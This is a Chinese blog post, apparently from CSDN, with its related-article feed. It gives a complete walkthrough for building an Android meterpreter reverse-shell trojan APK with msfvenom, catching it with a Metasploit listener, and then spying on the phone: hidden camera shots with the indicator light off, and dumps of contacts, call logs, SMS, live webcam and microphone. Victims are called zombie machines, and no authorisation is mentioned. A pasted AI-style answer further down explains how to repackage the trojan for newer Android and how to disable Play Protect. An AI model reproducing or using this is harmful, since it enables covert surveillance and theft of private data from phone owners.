kali 在手机上安装 apk

最新推荐文章于 2025-11-07 16:36:18 发布
原创 最新推荐文章于 2025-11-07 16:36:18 发布 · 3.3k 阅读 · 39 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#kail #apk #sessions #exploit #msfconsole

本文详细介绍了如何使用Metasploit框架生成针对安卓设备的木马apk文件,并通过reverse_tcp payload实现远程控制。从创建apk、配置监听到具体操作如屏幕截图、通讯录下载等,提供了完整的步骤指导。 
# 步骤
0. 首先得确保连接同一个wifi,处于同一个网络中

1. 创建一个apk
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.2.116 lport=9999 R > /root/520.apk

2. 开始操作
    2.1. 启动msfconsole
        msfconsole                
    2.2. 加载模块
        use exploit/multi/handler 
    2.3. 选择Payload
        set payload android/meterpreter/reverse_tcp 
    2.4. 这里的地址设置成我们刚才生成木马的IP地址
        set lhost 192.168.0.199
    2.5. 这里的端口设置成刚才我们生成木马所监听的端口
        set lport 9999
    2.6. 开始执行漏洞,开始监听,等待手机上线
        exploit
3. 注意事项
    3.1. 如果不自动跳转到meterpreter,那么肯定上面拼写错误了
    
    3.2. sessions -l 是查看当前肉鸡触发的会话列表
    
    3.3. sessions -i id 进入列表中的指定id
4. 重要技能
    4.1. 屏幕截图
        screenshot
    4.2. 闪照
        webcam_snap -i 1  // 后置摄像头闪照
        webcam_snap -i 2  // 前置摄像头闪照
        webcam_snap -i 2 -v false // 前置摄像头闪照且没有指示灯亮起
    4.3. 通讯录下载
        dump_contacts
    4.4. 通话记录下载
        dump_calllog
    4.5. 短信下载
        dump_sms
    4.6. 监控摄像头
        webcam_stream 
        输入上面命令后,会输出一个随机的xxx.html
        之后直接在浏览器上面访问xxx.html就可以看到实时的场景了
    4.7. 远程录音
        record_mic -d 13

 

小试牛刀 -- Kali Linux安装手机
weixin_39872516的博客
01-02 6100
安装Termux之前,需要安装F-Droid的APK程序到手机上,这是因为Termux是集成在F-Dorid里的,F-Droid的APK程序可通过如下网址进行下载(这里因为不能直接进行访问,需要在手上安装翻墙工具,我使用的是ClassX,具体如何安装ClassX,会在另外一篇文章上介绍)在这里因为原始的Termux的镜像源访问较慢,而且里面一些基本的工具包不具备,因此需要在Termux上进行安装和配置修改。设置可访问存储,如下命令,这样从Termux下载的工具包可以放置到手机的存储卡中。
手机安装Kali Linux
2301_80124151的博客
03-14 5984
在数字化时代,信息安全和隐私保护显得尤为重要。,作为一款专业的和工具,因其强大的功能和丰富的资源库而受到广大安全研究者和爱好者的青睐。然而,我们通常只能在传统的电脑设备上安装和使用Kali Linux。那么,有没有可能将也变成一款随身携带的Kali Linux设备呢?答案是肯定的。本文将介绍如何在手机安装Kali Linux,使你的手机变成一款强大的移动安全工具。,我们需要明确一点,手机安装Kali Linux并非简单的操作,需要对手机进行一定的改造和配置。
kali linux手机版下载免root,不需要root在安卓完全安装metasploit
weixin_34577501的博客
05-12 1万+
现在的安卓上有些软件真的是吊得飞起,上次写过一篇利用安卓软件【Linux deploy】安装完整kali Linux2.0,直接完美运行kali安装metasploit,工具啥的基本都有,但是缺点就是要占用比较大的一块内存,本来想我们这些屌丝用的手机都不是什么高端机,什么内存大的根本买不起,再日常还玩点农药简直了,那么这次为了解决我们的生*需求,我找到了一个满足我们渴望使用metasploit的,...
最新kali linux 新手教程!零基础入门到精通,收藏这篇就够了!
Cairo_A的博客
11-07 813
Kali Linux 是一个基于 Debian 的发行版,旨在用于渗透测试、道德黑客、数字取证和逆向工程。 它最初被称为 Whoppix 和 WHAX,后来更名为 Backtrack,之后更名为 Kali Linux。
kali 下载及安装
Chiao_Luo的博客
06-13 1955
kali 下载及安装 kali镜像下载 地址:http://old.kali.org/kali-images/ 来自:https://blog.youkuaiyun.com/weixin_48317592/article/details/112861564 kali iso版本 kali-linux-2021.1-live-amd64.iso kali安装教程 https://blog.youkuaiyun.com/qq_43508584/article/details/114274051 ...
在Android手机安装kali Linux
热门推荐
heStudio
03-12 8万+
由于kali官方的Nethunter[1]的安装代码因为…无法访问,手头又没有一些受支持的机器[2],所以做了这个脚本供大家使用。 工具 搭载基于Android的手机 Termux VNC Viewer(不一定需要) 手(脚也可以)
Termux使用记录
Make
06-04 4603
Termux是一个Android下一个高级的终端模拟器,开源且不需要root,支持apt管理软件包,十分方便安装软件包,完美支持Python,PHP,Ruby,Go,Nodejs,MySQL等。随着智能设备的普及和性能的不断提升,如今的手机、平板等的硬件标准已达到了初级桌面计算机的硬件标准,用心去打造完全可以把手机变成一个强大的工具. 官网 Github项目地址 Google Play下载地...
使用安卓手机安装Kali Linux
一名初中生
07-31 2636
如何使用安卓手机安装Kali Linux
Kali系统控制手机APK文件版本低的解决方法
12-11
- 在安装或运行时,设备提示APK版本太低或过时。 在Metasploit中生成APK时,默认的payload可能针对较旧的Android版本。解决方法是调整生成APK时的参数,以支持更高的目标API级别。 回顾引用: - 引用[1]和[3]使用...
kali生成安卓手机木马apk文件并打开文件位置
最新发布
12-13
需要安装python3和Java环境,使用python3生成apk文件,需要指定msf远控链接的IP和端口(本地的填本地Kali的IP,做了内网穿透填穿透后的公网地址和端口),命令示例如下: ```bash python main.py --lhost 192.168.0....
jarsigner重新签名apk无法安装的解决方法
09-04
在Android中,未经签名的APK不能在设备上安装,因此开发者需要使用`jarsigner`来完成这一过程。 当我们尝试使用`jarsigner`重新签名一个已有的APK时,可能会遇到无法安装的错误。这可能是由于多种原因,如签名算法...
安卓手机Kali Linux系统
05-12
自己整理的一份在安卓手机上跑Kali Linux系统,希望对各位有帮助
无需ROOT在手机安装kali工具集
黑白之道
04-11 4354
大家好,我是你们的老朋友Alex。今天教大家在手机安装kali的工具集,无需ROOT哦~~https://github.com/LionSec/katoolin这个链接就是我们要安装的工具了首先在手机上面安装GNURoot Debian,https://play.google.com/store/apps/details?id=com.gnuroot.debian&hl=en打开软件等待它首次加载
2025版最新手机Kali Linux下载安装教程(非常详细)零基础入门到精通,看完这一篇就够了!
ewii12567的博客
01-04 3444
Kali Linux是一个基于Debian的Linux发行版,由Offensive Security Ltd维护和资助。它专为渗透测试和数字取证而设计,集成了许多安全和取证工具,被安全专家广泛使用。以下是Kali Linux的一些主要特点:1. **预装工具**:Kali Linux拥有一系列预装的安全和渗透测试工具,这些工具覆盖了信息收集、漏洞分析、密码攻击、无线攻击、web应用攻击、嗅探和欺骗等多个领域。
毕业一年,从事运维感觉没有出路,如何转型更有前景?
Python_0011的博客
07-08 2258
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
手机安装 Kali Linux
白帽渗透笔记的博客
12-21 3万+
阅读本文大概需要 3.1 分钟 之前给大家介绍过 Kali Linux,它是一个专为网络安全人员打造的 Linux 发行版,集成了众多的渗透测试工具。 刚好最近在网上看到有个软件叫 Linux Deploy,可以在 Android 手机上运行 Linux 发行版,而其所支持的发行版中就包括了 Kali Linux。 本着好奇和爱折腾的心,拿我的旧手机鼓捣了一下,在这里分享记录一下折腾历程。 准备工作 1.硬件 旧 Android 手机一台(需要 root,手机至少 8G 储存空间) 友情提示:获取 .
kali Lonux手机版安装
2403_87971480的博客
12-13 2047
需要termuxkali一键安装命令过程中按y。
kali linux手机版安装(非常详细),零基础入门到精通,看这一篇就够了
隔壁王叔的博客
12-23 6524
kali linux手机版安装(非常详细),零基础入门到精通,看这一篇就够了
kali控制手机apk文件版本低
12-11
<think>我们正在处理用户关于“Kali系统控制手机APK文件版本低的解决方法”的问题。根据用户提供的引用资料,我们可以提取以下相关信息: 引用[2]和[3]提到了使用Kali生成后门APK来控制手机的过程,其中引用[3]具体给出了生成APK的命令: ``` msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 R > 1.apk ``` 用户遇到的问题是生成的APK文件版本过低,可能导致在较新的安卓设备上无法安装或运行。 ### 分析问题: 1. **APK版本过低的原因**:Metasploit框架中的`msfvenom`生成的APK可能针对较旧的Android版本,而新版本的Android系统(如Android 10及以上)对应用兼容性有更高要求。 2. **可能的解决方案**: - 更新`msfvenom`使用的payload模板,使其支持更高版本的Android。 - 手动调整生成的APK,提高其targetSdkVersion。 - 使用其他工具生成更高版本的APK。 ### 解决方案: #### 方法1:使用`msfvenom`时指定更高的Android版本 在生成APK时,可以尝试使用`--platform`和`--arch`参数指定平台和架构,但更直接的方法是使用`--android-target`选项指定目标Android SDK版本(该选项在较新版本的Metasploit中可用)。然而,标准`msfvenom`可能不直接支持这个选项,因此我们可以尝试使用以下方法: 尝试使用`--min-api`和`--target-api`参数(注意:这些参数在`msfvenom`中可能不可用,但我们可以尝试使用`apktool`重新打包APK以修改API级别)。 #### 方法2:修改生成的APK(推荐) 步骤: 1. 使用`msfvenom`生成原始APK。 2. 使用`apktool`解包APK。 3. 修改`AndroidManifest.xml`文件中的`targetSdkVersion`和`minSdkVersion`为更高的值(例如,设置`targetSdkVersion`为28或更高)。 4. 重新打包APK。 5. 对APK进行签名。 详细步骤: **步骤1:生成原始APK** ```bash msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -o original.apk ``` **步骤2:解包APK** ```bash apktool d original.apk -o output_dir ``` **步骤3:修改AndroidManifest.xml** 在`output_dir`目录中找到`AndroidManifest.xml`文件,在`<uses-sdk>`元素中修改(或添加)`android:targetSdkVersion`和`android:minSdkVersion`属性。例如: ```xml <uses-sdk android:minSdkVersion="19" android:targetSdkVersion="29" /> ``` **步骤4:重新打包APK** ```bash apktool b output_dir -o modified.apk ``` **步骤5:签名APK** 使用`jarsigner`或`apksigner`进行签名。首先需要生成一个密钥(如果还没有): ```bash keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000 ``` 然后使用该密钥签名: ```bash jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore modified.apk alias_name ``` 或者使用`apksigner`(在Android SDK构建工具中): ```bash apksigner sign --ks my-release-key.keystore --ks-key-alias alias_name modified.apk ``` #### 方法3:使用其他Payload生成选项 在Metasploit中,尝试使用不同的payload模块,例如使用`android/meterpreter_reverse_tcp`时,可以尝试使用`android/meterpreter_reverse_https`,该payload可能被更新以支持更高版本的Android。 #### 方法4:更新Metasploit 确保Kali系统和Metasploit框架是最新的: ```bash sudo apt update sudo apt full-upgrade ``` ### 注意事项: - 修改APK的`targetSdkVersion`可能会导致应用在新系统上获得更好的兼容性,但同时也可能需要处理新的权限模型(例如,Android 6.0以上需要运行时权限)。 - 如果目标手机有安全软件,可能会检测到重新打包的APK。 ### 总结: 推荐使用方法2(修改APK并重新签名)来解决APK版本过低的问题。如果问题仍然存在,可以尝试更新Metasploit或使用其他payload。 ### 相关问题: 1. 如何更新Kali Linux系统中的Metasploit框架? 2. 如何使用apktool反编译和重新打包APK文件? 3. 在安卓高版本系统中,如何绕过权限限制进行渗透测试? </think> ### Kali系统控制手机APK文件版本低的解决方法 当使用Kali生成的控制APK因版本过低无法在较新Android系统运行时,可通过以下方法解决: #### 1. **更新Payload生成命令** 调整`msfvenom`命令,显式指定更高Android版本: ```bash msfvenom -p android/meterpreter/reverse_tcp \ LHOST=192.168.1.10 \ LPORT=4444 \ --platform android \ --arch dalvik \ --min-sdk-version 24 \ # 指定最低支持Android 7.0 -o updated.apk ``` 关键参数: - `--min-sdk-version 24`:强制兼容Android 7.0+(数值对应SDK版本) - `--platform android`:明确目标平台[^3] #### 2. **手动修改APK配置(推荐)** 通过反编译修改`AndroidManifest.xml`: 1. 解包APK: ```bash apktool d original.apk -o decompiled ``` 2. 编辑`decompiled/AndroidManifest.xml`: ```xml <uses-sdk android:minSdkVersion="24" <!-- 最低版本 --> android:targetSdkVersion="30"/> <!-- 目标版本 --> ``` 3. 添加权限声明(Android 10+必需): ```xml <uses-permission android:name="android.permission.QUERY_ALL_PACKAGES"/> ``` 4. 重新打包并签名: ```bash apktool b decompiled -o modified.apk keytool -genkey -v -keystore key.keystore -alias myalias jarsigner -verbose -sigalg SHA256withRSA -keystore key.keystore modified.apk myalias ``` #### 3. **使用Frida动态注入(免APK安装)** 避免APK兼容性问题,直接注入进程: 1. 在Kali准备Frida脚本`hook.js`: ```javascript Java.perform(() => { const Runtime = Java.use('java.lang.Runtime'); Runtime.exec.overload('java.lang.String').implementation = (cmd) => { send("Command executed: " + cmd); return Runtime.getRuntime().exec(cmd); }; }); ``` 2. 在目标手机启动Frida服务: ```bash adb push frida-server /data/local/tmp adb shell "chmod 755 /data/local/tmp/frida-server" ``` 3. Kali执行注入: ```bash frida -U -f com.target.app -l hook.js ``` #### 4. **升级Metasploit框架** 确保使用最新Payload模块: ```bash sudo apt update && sudo apt install metasploit-framework msfupdate # 更新漏洞数据库 ``` > **注意**:Android 11+需额外处理: > - 开启USB调试:连续点击"设置-关于手机-版本号"激活开发者选项 > - 关闭"Google Play Protect"实时扫描 > - 在`adb install`时添加`-t`参数允许测试包 --- ### 相关问题 1. 如何检测目标手机的Android SDK版本以调整Payload兼容性? 2. 使用Frida注入时如何绕过Android系统的反调试机制? 3. Metasploit生成APK文件被手机安全软件拦截应如何解决? [^1]: Kali设备伪装技术可降低被识别风险 [^2]: 控制安卓设备需确保攻击端与目标在同一网段 : `msfvenom`生成APK需正确配置LHOST和LPORT参数 [^4]: Kali基础环境配置是渗透测试的前提条件
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值